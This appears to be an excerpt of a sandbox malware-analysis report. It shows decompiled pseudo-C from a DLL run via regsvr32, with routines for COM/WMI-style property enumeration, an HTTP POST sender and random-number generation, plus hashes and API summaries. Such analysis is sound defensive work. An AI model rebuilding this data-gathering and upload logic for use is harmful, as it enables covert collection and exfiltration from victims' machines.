				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































        0x1000db45
        0x1000db4b
        0x1000db52
        0x1000db55
        0x1000db58
        0x1000db5d
        0x1000db5f
        0x1000db64
        0x1000dfac
        0x1000dfac
        0x1000db71
        0x1000db73
        0x1000db76
        0x1000db79
        0x1000df91
        0x1000df97
        0x1000dfa1
        0x00000000
        0x1000dfa6
        0x1000db84
        0x1000db8b
        0x1000db92
        0x1000db95
        0x1000db9a
        0x1000db9c
        0x1000db9f
        0x1000dba2
        0x1000dba3
        0x1000dbac
        0x1000dbb2
        0x1000dbb5
        0x1000dbbe
        0x1000dbc3
        0x1000dbc8
        0x1000dbdf
        0x1000dbec
        0x1000dbef
        0x1000dbf6
        0x1000dbfb
        0x1000dc02
        0x1000dc07
        0x1000dc0e
        0x1000dc10
        0x1000dc1c
        0x1000dc1f
        0x1000dc21
        0x1000df81
        0x1000df82
        0x1000df8b
        0x00000000
        0x1000df8b
        0x1000dc27
        0x1000dc2a
        0x1000dc2d
        0x1000dc30
        0x1000dc32
        0x1000df4d
        0x1000df50
        0x1000df53
        0x1000df55
        0x1000df77
        0x1000df7c
        0x1000df57
        0x1000df5a
        0x1000df65
        0x1000df6c
        0x1000df6c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x1000dc38
        0x1000dc38
        0x1000dc4a
        0x1000dc4d
        0x1000dc4f
        0x00000000
        0x00000000
        0x1000dc57
        0x1000dc5a
        0x1000dc5d
        0x1000dc60
        0x1000dc63
        0x1000dc66
        0x00000000
        0x00000000
        0x1000dc6c
        0x1000dc7a
        0x1000dc7d
        0x1000dc7f
        0x1000dc98
        0x1000dca7
        0x1000dcaf
        0x1000dcaf
        0x1000dcb2
        0x1000dcb9
        0x1000dcbd
        0x1000dcc3
        0x1000dcc5
        0x1000df35
        0x1000df3b
        0x1000df41
        0x1000df44
        0x1000df44
        0x00000000
        0x1000df44
        0x1000dcd4
        0x1000dce8
        0x1000dcec
        0x1000dcee
        0x1000dcf3
        0x1000df02
        0x1000df08
        0x1000df13
        0x1000df1e
        0x1000df24
        0x1000df2a
        0x1000df2d
        0x00000000
        0x1000df2d
        0x1000dcf9
        0x1000ded0
        0x1000ded0
        0x1000ded3
        0x1000ded6
        0x00000000
        0x00000000
        0x1000dd01
        0x1000dd09
        0x1000dd10
        0x1000dd16
        0x1000dd18
        0x00000000
        0x00000000
        0x1000dd21
        0x1000dd36
        0x1000dd3c
        0x1000dd45
        0x1000dd48
        0x1000dd4b
        0x1000dd4d
        0x1000dec3
        0x1000dec6
        0x1000decf
        0x1000decf
        0x00000000
        0x1000decf
        0x1000dd5d
        0x1000dd60
        0x1000dd67
        0x1000dd6d
        0x1000dd70
        0x1000dd73
        0x1000dd76
        0x1000dd79
        0x1000ddb5
        0x1000ddb5
        0x1000ddb8
        0x1000de64
        0x1000de78
        0x1000de88
        0x1000de8c
        0x1000de8e
        0x1000dea5
        0x1000dea9
        0x1000deb2
        0x1000debd
        0x00000000
        0x1000debd
        0x1000de94
        0x1000de95
        0x1000de9a
        0x1000de9a
        0x1000de9c
        0x1000de9d
        0x1000dea2
        0x00000000
        0x1000dea2
        0x1000ddbe
        0x1000ddbe
        0x1000ddc1
        0x1000de2c
        0x1000de40
        0x1000de50
        0x1000de54
        0x1000de56
        0x00000000
        0x00000000
        0x1000de5c
        0x1000de5d
        0x00000000
        0x1000de5d
        0x1000ddc3
        0x1000ddc3
        0x1000ddc6
        0x00000000
        0x00000000
        0x1000ddc8
        0x1000ddcb
        0x00000000
        0x00000000
        0x1000ddcd
        0x1000ddcd
        0x1000ddd3
        0x1000ddef
        0x1000ddfe
        0x1000de07
        0x1000de0c
        0x1000de0f
        0x1000de15
        0x1000de15
        0x1000de1a
        0x1000de26
        0x00000000
        0x1000de26
        0x1000ddd8
        0x00000000
        0x1000ddd8
        0x1000dd7b
        0x1000dda2
        0x1000dda7
        0x1000ddac
        0x1000ddae
        0x1000ddae
        0x00000000
        0x1000ddac
        0x1000dd7d
        0x1000dd7d
        0x1000dd80
        0x00000000
        0x00000000
        0x1000dd86
        0x1000dd86
        0x1000dd89
        0x00000000
        0x00000000
        0x1000dd8f
        0x1000dd8f
        0x1000dd92
        0x00000000
        0x00000000
        0x1000dd98
        0x1000dd9b
        0x00000000
        0x00000000
        0x1000dd9d
        0x00000000
        0x1000dd9d
        0x1000dedf
        0x1000dee5
        0x1000deeb
        0x1000deee
        0x1000def1
        0x1000def1
        0x1000def4
        0x1000def5
        0x1000def8
        0x1000defa
        0x00000000
        0x00000000
        0x1000df4a
        0x1000df4a
        0x00000000
        0x1000df4a
        0x1000dc81
        0x1000dc87
        0x00000000
        0x1000dc87
        0x1000df47
        0x00000000
        0x1000dbca
        0x1000dbcf
        0x1000dbd4
        0x00000000
        0x1000dbd8

        APIs
          • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
          • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
          • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
          • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
          • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
          • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
        • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
        • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
        • SysFreeString.OLEAUT32(?), ref: 1000DF82
        • SysFreeString.OLEAUT32(?), ref: 1000DF8B
          • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 224402418-1412513891
        • Opcode ID: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
        • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
        • Opcode Fuzzy Hash: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
        • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































        0x1000e671
        0x1000e683
        0x1000e68c
        0x1000e696
        0x1000e69a
        0x1000e6ab
        0x1000e6c2
        0x1000e6cf
        0x1000e6dc
        0x1000e6e9
        0x1000e6ec
        0x1000e6f1
        0x1000e6f6
        0x1000e6f8
        0x1000e700
        0x1000e70b
        0x1000e712
        0x1000e71e
        0x1000e721
        0x1000e72f
        0x1000e732
        0x1000e738
        0x1000e739
        0x1000e73b
        0x1000e744
        0x1000e745
        0x1000e74a
        0x1000e750
        0x1000e75a
        0x1000e75c
        0x1000e761
        0x1000e761
        0x1000e770
        0x1000e77f
        0x1000e783
        0x1000e792
        0x1000e795
        0x1000e79a
        0x1000e79e
        0x1000e7a5
        0x1000e7ac
        0x1000e7b4
        0x1000e7bc
        0x1000e7c3
        0x1000e7cb
        0x1000e7d3
        0x1000e7da
        0x1000e7e2
        0x1000e7ea
        0x1000e7ff
        0x1000e80c
        0x1000e80e
        0x1000e813
        0x1000e813
        0x1000e81a
        0x1000e82b
        0x1000e830
        0x1000e832
        0x1000e832
        0x1000e846
        0x1000e858
        0x1000e85a
        0x1000e85d
        0x1000e862
        0x1000e862
        0x1000e869
        0x1000e878
        0x1000e87c
        0x1000e8ba
        0x1000e8bf
        0x1000e8c7
        0x1000e8cc
        0x1000e8d7
        0x1000e8dd
        0x1000e8e7
        0x1000e8ea
        0x1000e8f3
        0x1000e8f8
        0x1000e8f8
        0x1000e901
        0x1000e94a
        0x1000e94c
        0x1000e953
        0x1000e954
        0x1000e957
        0x1000e95d
        0x1000e961
        0x1000e962
        0x1000e967
        0x1000e969
        0x1000e96f
        0x1000e984
        0x1000e98c
        0x1000e9c1
        0x1000e9c6
        0x1000e9cb
        0x00000000
        0x1000e9cd
        0x1000e98e
        0x1000e990
        0x1000e990
        0x1000e999
        0x1000e99c
        0x1000e99e
        0x1000e9a0
        0x1000e9a6
        0x1000e9a6
        0x1000e9ab
        0x1000e9ad
        0x1000e9b4
        0x1000e9b4
        0x00000000
        0x1000e9b7
        0x1000e971
        0x1000e979
        0x00000000
        0x1000e903
        0x1000e903
        0x1000e909
        0x1000e90f
        0x1000e912
        0x00000000
        0x1000e912
        0x1000e901
        0x1000e87e
        0x1000e884
        0x1000e888
        0x1000e889
        0x1000e88e
        0x1000e890
        0x1000e896
        0x1000e8b4
        0x1000e8b4
        0x00000000
        0x1000e8b4
        0x1000e898
        0x1000e8a2
        0x1000e8a4
        0x1000e8a5
        0x1000e8aa
        0x1000e8ac
        0x1000e8b2
        0x00000000
        0x00000000
        0x00000000
        0x1000e86b
        0x1000e86b
        0x1000e914
        0x1000e914
        0x1000e91a
        0x1000e91d
        0x00000000
        0x1000e91d
        0x1000e81c
        0x1000e81c
        0x1000e91f
        0x1000e91f
        0x1000e925
        0x1000e928
        0x00000000
        0x1000e928
        0x1000e81a
        0x1000e785
        0x1000e92a
        0x1000e92d
        0x1000e92f
        0x1000e932
        0x1000e935
        0x1000e93e
        0x1000e943
        0x00000000
        0x00000000
        0x1000e947
        0x00000000
        0x1000e947
        0x1000e754
        0x00000000

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: memset$ErrorLast
        • String ID: POST
        • API String ID: 2570506013-1814004025
        • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
        • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
        • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
        • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
        Download Yara Rule
        C-Code - Quality: 28%
        			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















        0x100116c1
        0x100116c8
        0x100116d1
        0x100116d5
        0x10011750
        0x00000000
        0x10011752
        0x100116e3
        0x100116e5
        0x100116ea
        0x00000000
        0x00000000
        0x100116f2
        0x100116f4
        0x100116f9
        0x00000000
        0x00000000
        0x10011703
        0x10011707
        0x00000000
        0x00000000
        0x10011709
        0x1001170e
        0x10011710
        0x10011711
        0x10011715
        0x1001171b
        0x00000000
        0x00000000
        0x10011726
        0x1001172f
        0x10011733
        0x00000000
        0x00000000
        0x10011735
        0x10011737
        0x1001173f
        0x10011741
        0x10011742
        0x1001174a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
        • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
        • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
        • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.516519974.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
        • Associated: 00000004.00000002.516504464.0000000010000000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516635560.0000000010018000.00000002.00020000.sdmp Download File
        • Associated: 00000004.00000002.516644135.000000001001D000.00000004.00020000.sdmp Download File
        • Associated: 00000004.00000002.516650273.000000001001F000.00000002.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd
        Similarity
        • API ID: AddressProc$HandleModule
        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
        • API String ID: 667068680-129414566
        • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
        • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
        • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
        • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
        Download Yara Rule
        C-Code - Quality: 87%
        			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
